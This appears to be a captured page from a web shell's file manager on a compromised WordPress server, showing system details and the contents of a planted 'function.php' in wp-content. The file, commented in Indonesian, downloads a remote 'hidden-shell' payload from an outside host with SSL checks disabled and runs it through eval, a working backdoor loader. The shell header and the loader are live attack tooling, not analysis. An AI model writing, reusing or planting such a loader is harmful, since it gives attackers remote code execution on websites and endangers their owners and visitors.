HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
$ pwd: /home/httpd/html/stoptube.com/wp-content/
Upload Files
File: /home/httpd/html/stoptube.com/wp-content/function.php
<?php
// Fungsi untuk mengambil konten dari URL menggunakan cURL
function fetchContent($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Jangan verifikasi SSL
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);

    $content = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    return ($httpCode === 200) ? $content : false;
}

// Ambil konten dari URL dan jalankan
$url = 'https://hokigroup.cfd/hidden-shell/exploit-alfa.txt';
$content = fetchContent($url);

if ($content !== false) {
    if (strpos($content, 'session_start()') !== false) {
        $content = preg_replace('/session_start\s*\(\s*\)\s*;?/i', '', $content);
    }
    eval('?>' . $content);
} else {
    echo "Gagal mengambil konten dari URL.";
}
@ Telegram